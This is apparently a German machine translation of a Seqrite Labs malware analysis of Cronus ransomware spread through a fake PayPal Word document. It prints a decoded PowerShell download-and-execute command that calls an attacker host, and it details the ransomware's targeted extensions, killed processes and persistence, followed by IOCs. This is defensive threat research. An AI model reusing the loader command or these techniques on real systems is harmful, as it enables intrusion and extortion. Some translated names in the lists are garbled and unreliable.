Seqrite Das APT-Team von Labs hat kürzlich mehrere Kampagnen entdeckt, die gefälschte PayPal-Zahlungen als Köder nutzen. Diese zielen weltweit auf Einzelpersonen ab und verwenden eine neue Variante von Ransomware namens Cronus. Die Schadsoftware ist in PowerShell entwickelt und wird direkt im Arbeitsspeicher ausgeführt, ohne schädliche Daten auf die Festplatte zu schreiben.
In diesem Blogbeitrag untersuchen wir die Komplexität und die technischen Details der Kampagne, die wir während unserer Telemetrieanalyse entdeckt haben. Wir untersuchen die verschiedenen Phasen dieser Kampagne, beginnend mit der anfänglichen Dokumentnutzlast. Anschließend extrahieren und analysieren wir das bösartige VBA-Skript und überprüfen schließlich die PowerShell-Nutzlast das die Ransomware mithilfe des reflektierenden DLL-Ladens ausführt.
Erste Erkenntnisse
Am 14. Juli 2024 entdeckte unser Team ein bösartiges Dokument auf VirusTotal, abhängig von den Jagdregeln, die wir für Dateien verwenden, die schädliche eingebettete VBA-Makros enthalten.
Bei der ersten Analyse stellten wir fest, dass der bösartige Köder darauf abzielte, ein einfaches Quittungsdokument zu imitieren, bekannt als paypal_charges.doc. Beim Extrahieren der schädlichen Makros aus den schädlichen Streams stellten wir fest, dass das schädliche VBA den zweiten Stager-PowerShell-basierten Loader namens 8eef4df388f2217caec3dc26.ps1, das die auf Ransomware basierende DLL mithilfe der Reflective-Loading-Technik geladen hat.
Ransomware-Gruppen wie NETWALKER und viele andere haben diese Technik bereits früher zum Einsatz von Ransomware verwendet.
Infektionskette

Technische Analyse
Wir werden die Analyse in drei verschiedene Teile unterteilen.
Erstinfektion – Schädliches Dokument
Wir stellten zunächst fest, dass die Erstinfektion durch ein bösartiges Word-Dokument verursacht wurde, das sich hauptsächlich über einen Phishing-Vektor verbreitete. Daher beschlossen wir, zunächst den Inhalt des Köders genauer zu untersuchen, bevor wir uns mit den bösartigen Makro-Streams befassten.

Die Dokumentdatei verdeutlichte die Reife des Bedrohungsakteurs, da der Köder lediglich ein leeres Word-Dokument war. Daher haben wir uns entschlossen, die schädlichen Streams dieses bösartigen Dokuments genauer zu untersuchen und es schnell für eine weitere Analyse zu extrahieren.


Als wir herausfanden, wie die eingebetteten Makros funktionieren, stellten wir fest, dass sie durch unbrauchbare Kommentare und Variablennamen stark verschleiert sind, was die Analyse erschwert. Daher beschlossen wir, das VBA-Makro zu entschlüsseln. Es sieht in etwa so aus.

//Dekodierter Base64-Befehl.
IEX (New-Object Net.WebClient).DownloadString(‘hxxps[:]//eternal[.]lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26[.]jpg’);
Es war klar, dass das Makro powershell.exe verwendete, um eine Base64-codierte Zeichenfolge als Argument auszuführen. Die Dekodierung des Inhalts ergab, dass versucht wurde, die Nutzlast der zweiten Stufe von einem Server herunterzuladen.
Zweite Stufe – Bösartiger PowerShell Loader
Wir haben festgestellt, dass die Dateierweiterung .JPEG ist, der Dateityp jedoch eine PowerShell-Datei ist. Daher haben wir uns schnell dazu entschlossen, den schädlichen PowerShell-Loader zu verwenden.

Wie erwartet ist die zweite Phase durch Junk-Code stark verschleiert, was die Analyse erschwert. Daher haben wir beschlossen, das PowerShell-Skript manuell zu entschlüsseln, indem wir den Junk-Code entfernten und das Muster des verwendeten Junk-Codes beobachteten, um es für Analysten schwierig zu machen.
Das Skript wird durch drei Schichten Junk-Code verschleiert, der eine Reihe von Sequenzen wie diese enthält:
if ($a.ProcessName -like „junkcodesequenceone“){
….hier Junk-Code…..
….hier Junk-Code…..
….hier Junk-Code…..
}
if ($a.ProcessName -like „junkcodesequencetwo“){
….hier Junk-Code…..
….hier Junk-Code…..
….hier Junk-Code…..
}
..Eigentliches Powershell-Skript…
if ($a.ProcessName -like „junkcodesequencethree“){
….hier Junk-Code…..
….hier Junk-Code…..
….hier Junk-Code…..
}


Wenn wir uns den eigentlichen PowerShell-Code ansehen, sehen wir, dass die Datei Zwei-Byte-Arrays enthält mit .NET-Assemblys, die mittels Reflective Loading weiter in den Speicher gepackt werden. Die letzte Stufe sind die bösartigen .NET-Assemblys mit die Ransomware.

Letzte Phase – Bösartige .NET-Assembly
Lassen Sie uns die schädlichen .NET-Assemblys untersuchen, die wir im zweiten Schritt extrahiert haben. Nach der Extraktion haben wir die DLLs in das Tool Detect-It-Easy (DIE) geladen, um die gepackten oder geschützten .NET-Assembly-Dateien zu identifizieren.


Wir stellten fest, dass die erste .NET-Assembly mit .NET Reactor geschützt war, also entschieden wir uns, auspacken it und erforschen die Assemblydateien weiter mit automatisierten die dnSpy Werkzeug für a detaillierte Codeübersicht.

Nach dem Entpacken der ersten DLL-Datei, TESTxx.dll, stellten wir fest, dass die geladene Assembly ist verantwortlich für Durchführen einer Prozessinjektion. In diesem Fall wird die zweite ausführbare Datei, RegSvcs.exe, in den Speicher eines Prozesses eingefügt. Lassen Sie uns nun untersuchen die zweite bösartige ausführbare .NET-Datei.

Wenn wir uns die Main-Methode dieser endgültigen ausführbaren Datei ansehen, können wir sehen, dass der Code verschiedene Aufgaben im Zusammenhang mit Ransomware-basiertem Verhalten ausführt, wie z. B. das Ändern des Hintergrundbilds, Aufzählung und das Verschlüsseln bestimmter Dateien und Beenden laufende Prozesse.

Darüber hinaus können wir Methoden wie TRIPLE_ENCRYPT, VOLLSTÄNDIGE_VERSCHLÜSSELUNG und REKURSIVES_VERZEICHNIS_ANSICHT, AUSNAHMEDATEI und viele interessante. Daher werden wir einige spannende Funktionen dieser Ransomware untersuchen.
Selbstkopie
Die Ransomware-Binärdatei kopiert sich selbst auf C:\Benutzer\ \AppData\Local Pfad, und falls die Binärdatei bereits vorhanden ist oder kopiert wurde, löscht sie sich selbst. Sobald der Kopiervorgang an den Speicherort abgeschlossen ist, startet sie den Vorgang.

Aufzählung
Die Ransomware führt eine Enumeration durch, indem sie zunächst die lokalen Festplattenlaufwerke auflistet und dann die darin vorhandenen Dateien auflistet. Sie sucht auch nach bestimmten Ordnern in der \System\ Verzeichnis und schließt sie aus. Anschließend wird eine neue Aufgabe für die rekursive Verzeichnissuche erstellt.

Es zielt auf die Verschlüsselung bestimmter Dateitypen ab, die unten aufgeführt sind:
| .myd | .ndf | .qry | .sdb | .sdf | .tmd | . Tgz |
| .lzo | .txt | . Jar | .dat | .Kontakt | .die Einstellungen | .doc |
| . Docx | . Xls | . Xlsx | . Ppt | . PPTX | .odt | . Jpg |
| .mka | .mhtml | .oqy | . Png | .csv | .py | .sql |
| .indd | .cs | .mp3 | .mp4 | .dwg | .zip | . Selten |
| . Mov | .rtf | .bmp | . Mkv | . Avi | apk | LNK |
| .dib | .Dec | .diff | .mdb | . Php | .asp | . Aspx |
| . Html | . Htm | . Xml | .psd | .xla | .cub | |
| .dae | .divx | . Iso | .7zip | .pdb | . Ico | .pas |
| .db | .wmv | .swf | .cer | bak | .backup | .accdb |
| .Bucht | .p7c | .exif | .vss | .roh | . M4a | . Wma |
| .As | .arj | . Bz2 | . Taxi | .gzip | .lzh | .Teer |
| Jpeg | .xz | . Mpeg | .torrent | . Mpg | .core | .flv |
| .Ja | .sum | .ibank | .Brieftasche | . Css | . Js | .rb |
| .crt | .xlsm | .xlsb | . 7z | .cpp | .Java | .jpe |
| . Initial | .Klecks | .wps | .doc | . Wav | .3gp | . Gif |
| .log | gz | .config | .etc | .m1v | .sln | PST |
| OBJ- | .xlam | .djvu | .inkl | .cvs | DBF | .tbi |
| .wpd | .Punkt | .dotx | .webm | .m4v | .amv | .m4p |
| .svg | .ods | .bk | .vdi | .vmdk | .onepkg | .accde |
| .jsp | .json | .xltx | .vsdx | .uxdc | .udl | .3ds |
| .3fr | .3g2 | .accda | .accdc | .accdw | .adp | .ai |
| .ai3 | .ai4 | .ai5 | .ai6 | .ai7 | .ai8 | .arw |
| .ascx | .asm | .asmx | .avs | .bin | .cfm | .dbx |
| .dcm | .dcr | .pict | .rgbe | .dwt | .f4v | .exr |
| .kwm | .max | .mda | .mde | .mdf | .mdw | .mht |
| .mpv | .Nachricht | .myi | .nef | .odc | .Geo | .schnell |
| .odm | .odp | .oft | .orf | PFX | .p12 | .pl |
| .pls | .sicher | .Tab | vbs | .xlk | .xlm | .xlt |
| .xltm | .svgz | .slk | .tar.gz | .dmg | .ps | .psb |
| .tif | .rss | .key | .vob | .epsp | .dc3 | .iff |
| .opt | .onetoc2 | .nrw | .pptm | .potx | .potm | .Topf |
| .xlw | .xps | .xsd | .xsf | .xsl | .kmz | .accdr |
| .stm | .accdt | .ppam | .pps | .ppsm | .1cd | .p7b |
| .wdb | .sqlite | .sqlite3 | .dacpac | .zipx | .lzma | .z |
| .tar.xz | .pam | .r3d | .Eizellen | .1c | .dt | .c |
| .vmx | .xhtml | .ckp | .db3 | .dbc | .dbs | .dbt |
| .dbv | .frm | .mwb | .mrg | .txz | .vbox | .wmf |
| WIM | .xtp2 | .xsn | .xslt |
Verschlüsselung
Die Ransomware-Binärdatei verwendet je nach Dateigröße zwei verschiedene Verschlüsselungsmethoden. Bei Dateien unter 512 KB verschlüsselt die Methode FULL_ENCRYPT die Dateien auf einmal. Bei Dateien über 512 KB zerlegt die Methode TRIPLE_ENCRYPT den Dateiinhalt in mehrere Teile und verschlüsselt diese. Beide Methoden verwenden die AES-Verschlüsselungsmethode zur Verschlüsselung der Dateien.

Es wird eine kleine EXCEPTIONAL_FILE hinzugefügt, in der die oben genannten Dateien ausgeschlossen und verschlüsselt werden. Während der Verschlüsselung wird auch die Ransomware-Nachricht mit einer Datei namens cronus.txt.

Prozessbeendigung
Die Ransomware-Binärdatei beendet viele Prozesse, indem sie das Hauptfenster nach der Aufzählung aller laufenden Prozesse schließt. Die Liste der dadurch beendeten Prozesse lautet wie folgt:
| SQL-Writer | sqbcoreservice | VirtualBoxVM | sqlagent | SQL-Browser | sqlserver | Code |
| steam | zoolz | agntsvc | Firefox-Konfiguration | Infopath | Synchronisierungszeit | VBoxSVC |
| tbirdconfig | die Fledermaus | thebat64 | isqlplussvc | meinDesktopservice | mysqld | ocssd |
| OneNote | mspub | mydesktopqos | CNTAoSMgr | Ntrtscan | vmplayer | Orakel |
| Ausblick | powerpnt | WPs | xfssvccon | ProcessHacker | dbeng50 | dbsnmp |
| encsvc | übertreffen | tmlisten | PccNTMon | mysqld-nt | mysqld-opt | ocautoupds |
| ocomm | MS Access | msftesql | thunderbird | Visio | Winword | wordpad |
| mbamtray |
Sobald alle oben genannten Prozesse erfolgreich beendet wurden, ruft es erneut den ALLE_LAUFWERKE Methode, die bestimmte Dateien weiter aufzählt und verschlüsselt.
Beharrlichkeit
Die Ransomware-Binärdatei missbraucht die berühmte RunKeys für Persistenz, da es einen neuen Schlüssel mit dem Namen anhängt Kronos zum obigen Registrierungs-Hive, der die Binärdatei ausführt RegSvcs.exe beim Start.

Datenmanipulation
Die Ransomware durchsucht den Inhalt der Zwischenablage. Findet sie dort eine Bitcoin-Adresse, ersetzt sie diese durch die Adresse des BTC-Wallets des Angreifers, die zur Auszahlung des Lösegelds verwendet wird.



Der Erpresserbrief hebt eine BTC-Wallet-Adresse hervor, die, auf Untersuchung, dreht sich raus zu leer sein.

Codeüberlappung
Nach der Untersuchung und Untersuchung eines weiteren Korpus von Malware-Beispielen können wir zu dem Schluss kommen, dass sich der im PowerShell-Loader vorhandene Code, der in dieser Kampagne verwendete DLL-Injector, mit anderen aktiven dateilosen Malware-Kampagnen überschneidet, wie beispielsweise den folgenden:
- Rache RAT
- Pfeilratte
- Asynchrone RAT
- Andromeda RAT
- XWorm
- nRAT
Fazit
Wir haben festgestellt, dass Cronus Ransomware, eine dateilose Malware-Variante, sehr neu ist und sich aktiv verbreitet. Die oben beschriebene Vorgehensweise wird derzeit hauptsächlich verwendet, um die Ransomware auf verschiedenen Zielcomputern zu platzieren.
Seqrite Schutz
- SCRIPT.Cronus.48939.GC
- OLE.Cronus.48940.GC
- Lösegeld.Cronus
- Trojan.Injector
IOCs
| Hashes [SHA-256] | Dateiname |
| 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3 | paypal_charges.doc |
| 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb | paypal_charges.doc |
| afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987 | ~WRL003.tmp |
| 629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53 | 8eef4df388f2217caec3dc26.ps1
|
| dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3 | TESTxx.dll |
| 42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad | p000.exe
|
| URLs |
| hxxps://eternal[.]lol/file/ |
MITRE ATT & CK
| Taktik | Technik-ID | Name |
| Erster Zugriff | T1566.001 | Phishing: Spear-Phishing-Anhang |
| Ausführung | T1204.002
T1059.001 T1059.005 |
Benutzerausführung: Schädliche Datei
Befehls- und Skriptinterpreter: PowerShell Befehls- und Skriptinterpreter: Visual Basic |
| Beharrlichkeit | T1547.001 | Registrierungsschlüssel ausführen / Startordner |
| Verteidigungsflucht | T1027.010 T1620 T1055.012 |
Befehlsverschleierung Reflektierendes Laden von Code Aushöhlungsprozess |
| Bewertung | T1057 T1083 |
Prozesserkennung Datei- und Verzeichniserkennung |
| Auswirkungen | T1486 T1491.001 T1565.002 |
Daten für mehr Wirkung verschlüsselt. Defacement: Internes Defacement Datenmanipulation: Manipulation der übertragenen Daten |
Mitwirkende
- Subhajeet Singha
- Sathwik Ram Prakki



